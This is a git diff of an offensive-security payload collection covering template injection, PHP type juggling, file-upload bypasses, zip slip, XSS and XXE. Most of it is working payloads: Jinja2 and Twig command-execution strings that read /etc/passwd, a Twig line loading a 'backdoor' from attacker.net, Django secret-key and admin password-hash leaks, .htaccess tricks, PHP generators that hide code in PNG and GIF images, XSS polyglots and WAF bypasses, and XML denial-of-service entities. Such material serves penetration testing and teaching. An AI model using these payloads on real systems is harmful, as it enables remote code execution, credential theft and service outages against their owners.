[Tplmap](https://github.com/epinna/tplmap) - Server-Side Template Injection and Code Injection Detection and Exploitation Tool
|
||||
|
||||
e.g:
|
||||
|
||||
```powershell
|
||||
@ -84,6 +92,16 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomm
|
||||
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
|
||||
```
|
||||
|
||||
[SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [Tplmap](https://github.com/epinna/tplmap)
|
||||
|
||||
e.g:
|
||||
|
||||
```powershell
|
||||
python3 ./sstimap.py -u 'https://example.com/page?name=John' -s
|
||||
python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade
|
||||
python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk'
|
||||
```
|
||||
|
||||
## Methodology
|
||||
|
||||
![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/serverside.png?raw=true)
|
||||
@ -311,6 +329,7 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val
|
||||
## Java
|
||||
|
||||
### Java - Basic injection
|
||||
> Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.
|
||||
|
||||
```java
|
||||
${7*7}
|
||||
@ -336,6 +355,67 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
|
||||
|
||||
---
|
||||
|
||||
## Django Templates
|
||||
|
||||
Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.
|
||||
|
||||
### Detection
|
||||
|
||||
|
||||
```python
|
||||
{% csrf_token %} # Causes error with Jinja2
|
||||
{{ 7*7 }} # Error with Django Templates
|
||||
ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
|
||||
```
|
||||
|
||||
### Django Templates for post-exploitation
|
||||
|
||||
```python
|
||||
# Variables
|
||||
{{ variable }}
|
||||
{{ variable.attr }}
|
||||
|
||||
# Filters
|
||||
{{ value|length }}
|
||||
|
||||
# Tags
|
||||
{% csrf_token %}
|
||||
```
|
||||
|
||||
### Cross-site scripting
|
||||
|
||||
```python
|
||||
{{ '<script>alert(3)</script>' }}
|
||||
{{ '<script>alert(3)</script>' | safe }}
|
||||
```
|
||||
|
||||
### Debug information leak
|
||||
|
||||
```python
|
||||
{% debug %}
|
||||
```
|
||||
|
||||
### Leaking app’s Secret Key
|
||||
|
||||
```python
|
||||
{{ messages.storages.0.signer.key }}
|
||||
```
|
||||
|
||||
### Admin Site URL leak
|
||||
|
||||
|
||||
```
|
||||
{% include 'admin/base.html' %}
|
||||
```
|
||||
|
||||
### Admin username and password hash leak
|
||||
|
||||
|
||||
```
|
||||
{% load log %}{% get_admin_log 10 as log %}{% for e in log %}
|
||||
{{e.user.get_username}} : {{e.user.password}}{% endfor %}
|
||||
```
|
||||
|
||||
## Jinja2
|
||||
|
||||
[Official website](https://jinja.palletsprojects.com/)
|
||||
@ -417,15 +497,30 @@ Listen for connection
|
||||
nc -lnvp 8000
|
||||
```
|
||||
|
||||
#### Jinja2 - Forcing output on blind RCE
|
||||
|
||||
You can import Flask functions to return an output from the vulnerable page.
|
||||
|
||||
```py
|
||||
{{
|
||||
x.__init__.__builtins__.exec("from flask import current_app, after_this_request
|
||||
@after_this_request
|
||||
def hook(*args, **kwargs):
|
||||
from flask import make_response
|
||||
r = make_response('Powned')
|
||||
return r
|
||||
")
|
||||
}}
|
||||
```
|
||||
|
||||
|
||||
#### Exploit the SSTI by calling os.popen().read()
|
||||
|
||||
These payloads are context-free, and do not require anything, except being in a jinja2 Template object:
|
||||
|
||||
```python
|
||||
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
|
||||
|
||||
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
|
||||
|
||||
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
|
||||
```
|
||||
|
||||
@ -433,9 +528,7 @@ We can use these shorter payloads (this is the shorter payloads known yet):
|
||||
|
||||
```python
|
||||
{{ cycler.__init__.__globals__.os.popen('id').read() }}
|
||||
|
||||
{{ joiner.__init__.__globals__.os.popen('id').read() }}
|
||||
|
||||
{{ namespace.__init__.__globals__.os.popen('id').read() }}
|
||||
```
|
||||
|
||||
@ -829,6 +922,9 @@ $output = $twig > render (
|
||||
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
||||
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||
{{['id']|filter('system')}}
|
||||
{{[0]|reduce('system','id')}}
|
||||
{{['id']|map('system')|join}}
|
||||
{{['id',1]|sort('system')|join}}
|
||||
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||
```
|
||||
@ -866,6 +962,126 @@ $str.valueOf($chr.toChars($out.read()))
|
||||
|
||||
---
|
||||
|
||||
## patTemplate
|
||||
|
||||
> [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts
|
||||
|
||||
```xml
|
||||
<patTemplate:tmpl name="page">
|
||||
This is the main page.
|
||||
<patTemplate:tmpl name="foo">
|
||||
It contains another template.
|
||||
</patTemplate:tmpl>
|
||||
<patTemplate:tmpl name="hello">
|
||||
Hello {NAME}.<br/>
|
||||
</patTemplate:tmpl>
|
||||
</patTemplate:tmpl>
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## PHPlib and HTML_Template_PHPLIB
|
||||
|
||||
[HTML_Template_PHPLIB](https://github.com/pear/HTML_Template_PHPLIB) is the same as PHPlib but ported to Pear.
|
||||
|
||||
`authors.tpl`
|
||||
|
||||
```html
|
||||
<html>
|
||||
<head><title>{PAGE_TITLE}</title></head>
|
||||
<body>
|
||||
<table>
|
||||
<caption>Authors</caption>
|
||||
<thead>
|
||||
<tr><th>Name</th><th>Email</th></tr>
|
||||
</thead>
|
||||
<tfoot>
|
||||
<tr><td colspan="2">{NUM_AUTHORS}</td></tr>
|
||||
</tfoot>
|
||||
<tbody>
|
||||
<!-- BEGIN authorline -->
|
||||
<tr><td>{AUTHOR_NAME}</td><td>{AUTHOR_EMAIL}</td></tr>
|
||||
<!-- END authorline -->
|
||||
</tbody>
|
||||
</table>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
`authors.php`
|
||||
|
||||
```php
|
||||
<?php
|
||||
//we want to display this author list
|
||||
$authors = array(
|
||||
'Christian Weiske' => 'cweiske@php.net',
|
||||
'Bjoern Schotte' => 'schotte@mayflower.de'
|
||||
);
|
||||
|
||||
require_once 'HTML/Template/PHPLIB.php';
|
||||
//create template object
|
||||
$t =& new HTML_Template_PHPLIB(dirname(__FILE__), 'keep');
|
||||
//load file
|
||||
$t->setFile('authors', 'authors.tpl');
|
||||
//set block
|
||||
$t->setBlock('authors', 'authorline', 'authorline_ref');
|
||||
|
||||
//set some variables
|
||||
$t->setVar('NUM_AUTHORS', count($authors));
|
||||
$t->setVar('PAGE_TITLE', 'Code authors as of ' . date('Y-m-d'));
|
||||
|
||||
//display the authors
|
||||
foreach ($authors as $name => $email) {
|
||||
$t->setVar('AUTHOR_NAME', $name);
|
||||
$t->setVar('AUTHOR_EMAIL', $email);
|
||||
$t->parse('authorline_ref', 'authorline', true);
|
||||
}
|
||||
|
||||
//finish and echo
|
||||
echo $t->finish($t->parse('OUT', 'authors'));
|
||||
?>
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Plates
|
||||
|
||||
Plates is inspired by Twig but a native PHP template engine instead of a compiled template engine.
|
||||
|
||||
controller:
|
||||
|
||||
```php
|
||||
// Create new Plates instance
|
||||
$templates = new League\Plates\Engine('/path/to/templates');
|
||||
|
||||
// Render a template
|
||||
echo $templates->render('profile', ['name' => 'Jonathan']);
|
||||
```
|
||||
|
||||
page template:
|
||||
|
||||
```php
|
||||
<?php $this->layout('template', ['title' => 'User Profile']) ?>
|
||||
|
||||
<h1>User Profile</h1>
|
||||
<p>Hello, <?=$this->e($name)?></p>
|
||||
```
|
||||
|
||||
layout template:
|
||||
|
||||
```php
|
||||
<html>
|
||||
<head>
|
||||
<title><?=$this->e($title)?></title>
|
||||
</head>
|
||||
<body>
|
||||
<?=$this->section('content')?>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## References
|
||||
|
||||
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||
@ -889,3 +1105,5 @@ $str.valueOf($chr.toChars($out.read()))
|
||||
* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
|
||||
* [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/)
|
||||
* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
|
||||
* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)
|
||||
* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw)
|
@ -52,22 +52,22 @@ function validate_cookie($cookie,$key){
|
||||
...
|
||||
```
|
||||
|
||||
The $cookie variable is provided by the user. The $key variable is a secret and unknown to the user.
|
||||
The `$cookie` variable is provided by the user. The $key variable is a secret and unknown to the user.
|
||||
|
||||
If we can make the calculated hash string Zero-like, and provide "0" in the $cookie['hmac'], the check will pass.
|
||||
If we can make the calculated hash string Zero-like, and provide "0" in the `$cookie['hmac']`, the check will pass.
|
||||
|
||||
```
|
||||
```ps1
|
||||
"0e768261251903820937390661668547" == "0"
|
||||
```
|
||||
|
||||
We have control over 3 elements in the cookie:
|
||||
- $username - username you are targeting, probably "admin"
|
||||
- $hmac - the provided hash, "0"
|
||||
- $expiration - a UNIX timestamp, must be in the future
|
||||
- `$username` - username you are targeting, probably "admin"
|
||||
- `$hmac` - the provided hash, "0"
|
||||
- `$expiration` - a UNIX timestamp, must be in the future
|
||||
|
||||
Increase the expiration timestamp enough times and we will eventually get a Zero-like calculated HMAC.
|
||||
|
||||
```
|
||||
```ps1
|
||||
hash_hmac(admin|1424869663) -> "e716865d1953e310498068ee39922f49"
|
||||
hash_hmac(admin|1424869664) -> "8c9a492d316efb5e358ceefe3829bde4"
|
||||
hash_hmac(admin|1424869665) -> "9f7cdbe744fc2dae1202431c7c66334b"
|
||||
@ -80,8 +80,10 @@ hash_hmac(admin|1835970773) -> "0e174892301580325162390102935332" // "0e17489230
|
||||
|
||||
If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float.
|
||||
|
||||
| Hash | “Magic” Number / String | Magic Hash | Found By / Description |
|
||||
| Hash | "Magic" Number / String | Magic Hash | Found By / Description |
|
||||
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
|
||||
| MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
|
||||
| MD4 | IiF+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
|
||||
| MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
|
||||
| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
|
||||
| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
|
||||
@ -106,3 +108,5 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
|
||||
* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
|
||||
* [Magic Hashes - WhiteHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
|
||||
* [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf)
|
||||
* [spaze/hashes - Magic hashes – PHP hash "collisions"](https://github.com/spaze/hashes)
|
||||
* [(Super) Magic Hashes - Mon 07 October 2019 - myst404 (@myst404_)](https://offsec.almond.consulting/super-magic-hash.html)
|
@ -0,0 +1 @@
|
||||
AddType application/x-httpd-php .rce
|
@ -25,6 +25,11 @@ AddType application/x-httpd-php .htaccess
|
||||
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
|
||||
```
|
||||
|
||||
# .htaccess simple php
|
||||
|
||||
Upload an .htaccess with : `AddType application/x-httpd-php .rce`
|
||||
Then upload any file with `.rce` extension.
|
||||
|
||||
# .htaccess upload as image
|
||||
|
||||
If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.
|
||||
|
Before Width: | Height: | Size: 7.2 KiB After Width: | Height: | Size: 7.2 KiB |
Before Width: | Height: | Size: 1.1 KiB After Width: | Height: | Size: 1.1 KiB |
Before Width: | Height: | Size: 377 B After Width: | Height: | Size: 377 B |
Before Width: | Height: | Size: 174 B After Width: | Height: | Size: 174 B |
@ -1,7 +1,6 @@
|
||||
#!/usr/bin/python
|
||||
|
||||
"""
|
||||
|
||||
Bulletproof Jpegs Generator
|
||||
Copyright (C) 2012 Damien "virtualabs" Cauquil
|
||||
|
||||
@ -18,7 +17,11 @@
|
||||
You should have received a copy of the GNU General Public License along
|
||||
with this program; if not, write to the Free Software Foundation, Inc.,
|
||||
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||
|
||||
|
||||
-------------
|
||||
# How to use
|
||||
b.php?c=ls
|
||||
Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
|
||||
"""
|
||||
from __future__ import print_function
|
||||
|
@ -0,0 +1,22 @@
|
||||
<?php
|
||||
// createGIFwithGlobalColorTable.php
|
||||
$_file="example.gif";
|
||||
$_payload="<?php evil();?>";
|
||||
$_width=200;
|
||||
$_height=200;
|
||||
if(strlen($_payload)%3!=0){
|
||||
echo "payload%3==0 !"; exit();
|
||||
}
|
||||
$im = imagecreate($_width, $_height);
|
||||
$_hex=unpack('H*',$_payload);
|
||||
|
||||
$colors_hex=str_split($_hex[1], 6);
|
||||
|
||||
for($i=0; $i < count($colors_hex); $i++){
|
||||
$_color_chunks=str_split($colors_hex[$i], 2);
|
||||
$color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
|
||||
imagesetpixel($im,$i,1,$color);
|
||||
}
|
||||
|
||||
imagegif($im,$_file);
|
||||
?>
|
@ -0,0 +1,28 @@
|
||||
<?php
|
||||
//createPNGwithPLTE.php
|
||||
// bypass imageCreateFromPng and imagepng
|
||||
$_payload="<?php phpinfo()?> ";
|
||||
$_pay_len=strlen($_payload);
|
||||
if(strlen($_payload)%3!=0){
|
||||
echo "payload%3==0 !"; exit();
|
||||
}
|
||||
|
||||
|
||||
$width=$_pay_len/3;
|
||||
$height=20;
|
||||
//$im = imageCreateFromPng("existing.png");
|
||||
$im = imagecreate($width, $height);
|
||||
|
||||
$_hex=unpack('H*',$_payload);
|
||||
$_chunks=str_split($_hex[1], 6);
|
||||
|
||||
for($i=0; $i < count($_chunks); $i++){
|
||||
|
||||
$_color_chunks=str_split($_chunks[$i], 2);
|
||||
$color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
|
||||
|
||||
imagesetpixel($im,$i,1,$color);
|
||||
|
||||
}
|
||||
|
||||
imagepng($im,"example.png");
|
@ -1,5 +0,0 @@
|
||||
# How to use
|
||||
b.php?c=ls
|
||||
|
||||
|
||||
Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
|
@ -9,7 +9,7 @@
|
||||
* [Defaults extensions](#defaults-extensions)
|
||||
* [Upload tricks](#upload-tricks)
|
||||
* [Filename vulnerabilities](#filename-vulnerabilities)
|
||||
* [Picture upload with LFI](#picture-upload-with-lfi)
|
||||
* [Picture compression](#picture-compression-)
|
||||
* [Configuration Files](#configuration-files)
|
||||
* [CVE - Image Tragik](#cve---image-tragik)
|
||||
* [CVE - FFMpeg](#cve---ffmpeg)
|
||||
@ -107,12 +107,16 @@ Also you upload:
|
||||
- HTML/SVG files to trigger an XSS
|
||||
- EICAR file to check the presence of an antivirus
|
||||
|
||||
### Picture upload with LFI
|
||||
### Picture Compression
|
||||
|
||||
Valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
|
||||
Create valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
|
||||
|
||||
- Picture Metadata, hide the payload inside a comment tag in the metadata.
|
||||
- Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`.
|
||||
- [JPG](https://virtualabs.fr/Nasty-bulletproof-Jpegs-l): use createBulletproofJPG.py
|
||||
- [PNG](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createPNGwithPLTE.php
|
||||
- [GIF](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createGIFwithGlobalColorTable.php
|
||||
|
||||
|
||||
### Picture with custom metadata
|
||||
|
||||
@ -185,7 +189,11 @@ When a ZIP/archive file is automatically decompressed after the upload
|
||||
### Jetty RCE
|
||||
|
||||
Upload the XML file to `$JETTY_BASE/webapps/`
|
||||
* [JettyShell.xml](https://raw.githubusercontent.com/Mike-n1/tips/main/JettyShell.xml)
|
||||
* [JettyShell.xml - From Mikhail Klyuchnikov](https://raw.githubusercontent.com/Mike-n1/tips/main/JettyShell.xml)
|
||||
|
||||
## Labs
|
||||
|
||||
* [Portswigger Labs on File Uploads](https://portswigger.net/web-security/all-labs#file-upload-vulnerabilities)
|
||||
|
||||
|
||||
## References
|
||||
@ -198,4 +206,7 @@ Upload the XML file to `$JETTY_BASE/webapps/`
|
||||
* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
|
||||
* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
|
||||
* [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
|
||||
* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
|
||||
* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
|
||||
* [Injection points in popular image formats - Daniel Kalinowski - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/)
|
||||
* [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/)
|
||||
* [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/)
|
||||
|
@ -4,11 +4,11 @@
|
||||
|
||||
## Summary
|
||||
|
||||
- [Detection](#detection)
|
||||
- [Tools](#tools)
|
||||
* [Detection](#detection)
|
||||
* [Tools](#tools)
|
||||
* [Exploits](#exploits)
|
||||
* [Basic Exploit](#basic-exploit)
|
||||
- [Additional Notes](#additional-notes)
|
||||
* [Additional Notes](#additional-notes)
|
||||
|
||||
## Detection
|
||||
|
||||
@ -16,12 +16,14 @@
|
||||
|
||||
## Tools
|
||||
|
||||
- evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
|
||||
- [evilarc](https://github.com/ptoomey3/evilarc)
|
||||
- [slipit](https://github.com/usdAG/slipit)
|
||||
|
||||
## Exploits
|
||||
|
||||
### Basic Exploit
|
||||
|
||||
Using evilarc:
|
||||
```python
|
||||
python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
|
||||
```
|
||||
|
@ -49,6 +49,9 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
|
||||
<meta property="og:image" content="https://test"><script>alert(1)</script>">
|
||||
```
|
||||
|
||||
## Labs
|
||||
|
||||
* [PortSwigger Labs for Web cache deception](https://portswigger.net/web-security/all-labs#web-cache-poisoning)
|
||||
|
||||
## References
|
||||
|
||||
|
@ -59,6 +59,10 @@ application uses a `Sec-WebSocket-Protocol` header in the handshake request,
|
||||
you have to add this value as a 2nd parameter to the `WebSocket` function call
|
||||
in order to add this header.
|
||||
|
||||
## Labs
|
||||
|
||||
* [PortSwigger Labs for Web Sockets](https://portswigger.net/web-security/all-labs#http-request-smuggling)
|
||||
|
||||
## References
|
||||
|
||||
- [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
|
||||
|
@ -13,3 +13,4 @@ javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert(
|
||||
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
|
||||
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
|
||||
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
|
||||
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
|
||||
|
@ -629,6 +629,11 @@ javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></st
|
||||
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
|
||||
```
|
||||
|
||||
Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/)
|
||||
```javascript
|
||||
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
|
||||
```
|
||||
|
||||
## Filter Bypass and exotic payloads
|
||||
|
||||
### Bypass case sensitive
|
||||
@ -1222,6 +1227,10 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
||||
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
|
||||
```
|
||||
|
||||
## Labs
|
||||
|
||||
* [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)
|
||||
|
||||
## References
|
||||
|
||||
- [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
|
||||
|
@ -175,6 +175,12 @@ AngularJS (without `'` single and `"` double quotes and `constructor` string)
|
||||
{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
|
||||
```
|
||||
|
||||
AngularJS bypass Waf [Imperva]
|
||||
|
||||
```javascript
|
||||
{{x=['constr', 'uctor'];a=x.join('');b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'pr\\u{6f}mpt(d\\u{6f}cument.d\\u{6f}main)')()}}
|
||||
```
|
||||
|
||||
### Blind XSS
|
||||
|
||||
1.0.1 - 1.1.5 && > 1.6.0 by Mario Heiderich (Cure53)
|
||||
|
@ -20,6 +20,8 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
||||
- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks)
|
||||
- [Exploiting XXE to perform a deny of service](#exploiting-xxe-to-perform-a-deny-of-service)
|
||||
- [Billion Laugh Attack](#billion-laugh-attack)
|
||||
- [Yaml attack](#yaml-attack)
|
||||
- [Parameters Laugh attack](#parameters-laugh-attack)
|
||||
- [Error Based XXE](#error-based-xxe)
|
||||
- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band)
|
||||
- [Blind XXE](#blind-xxe)
|
||||
@ -228,6 +230,20 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
|
||||
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
|
||||
```
|
||||
|
||||
### Parameters Laugh attack
|
||||
|
||||
A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping.
|
||||
|
||||
```xml
|
||||
<!DOCTYPE r [
|
||||
<!ENTITY % pe_1 "<!---->">
|
||||
<!ENTITY % pe_2 "%pe_1;<!---->%pe_1;">
|
||||
<!ENTITY % pe_3 "%pe_2;<!---->%pe_2;">
|
||||
<!ENTITY % pe_4 "%pe_3;<!---->%pe_3;">
|
||||
%pe_4;
|
||||
]>
|
||||
<r/>
|
||||
```
|
||||
|
||||
## Error Based XXE
|
||||
|
||||
@ -372,7 +388,18 @@ Assuming payloads such as the previous return a verbose error. You can start poi
|
||||
]>
|
||||
<root></root>
|
||||
```
|
||||
|
||||
### Cisco WebEx
|
||||
```
|
||||
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd">
|
||||
<!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'>
|
||||
%local_dtd;
|
||||
```
|
||||
### Citrix XenMobile Server
|
||||
```
|
||||
<!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd">
|
||||
<!ENTITY % Body '>Your DTD code<!ENTITY test "test"'>
|
||||
%local_dtd;
|
||||
```
|
||||
[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)
|
||||
|
||||
|
||||
@ -591,11 +618,16 @@ we can convert the character encoding to `UTF-16` using [iconv](https://man7.org
|
||||
```bash
|
||||
cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml
|
||||
```
|
||||
UTF-7 encoding can be used as well to bypass UTF-8/UTF-16 rules.
|
||||
|
||||
## Labs
|
||||
|
||||
* [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection)
|
||||
|
||||
## References
|
||||
|
||||
* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
|
||||
* [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
|
||||
* [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka
|
||||
* [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
|
||||
* [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
|
||||
@ -616,3 +648,6 @@ cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml
|
||||
* [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
|
||||
* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon
|
||||
* [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK
|
||||
* [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin
|
||||
* [Payloads for Cisco and Citrix - Arseniy Sharoglazov](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
|
||||
|
||||
|
@ -11,7 +11,6 @@
|
||||
- [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg)
|
||||
- [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained)
|
||||
- [STÖK](https://www.youtube.com/c/STOKfredrik)
|
||||
- [Defcon](https://www.youtube.com/user/DEFCONConference)
|
||||
- [Hackersploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q)
|
||||
- [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw)
|
||||
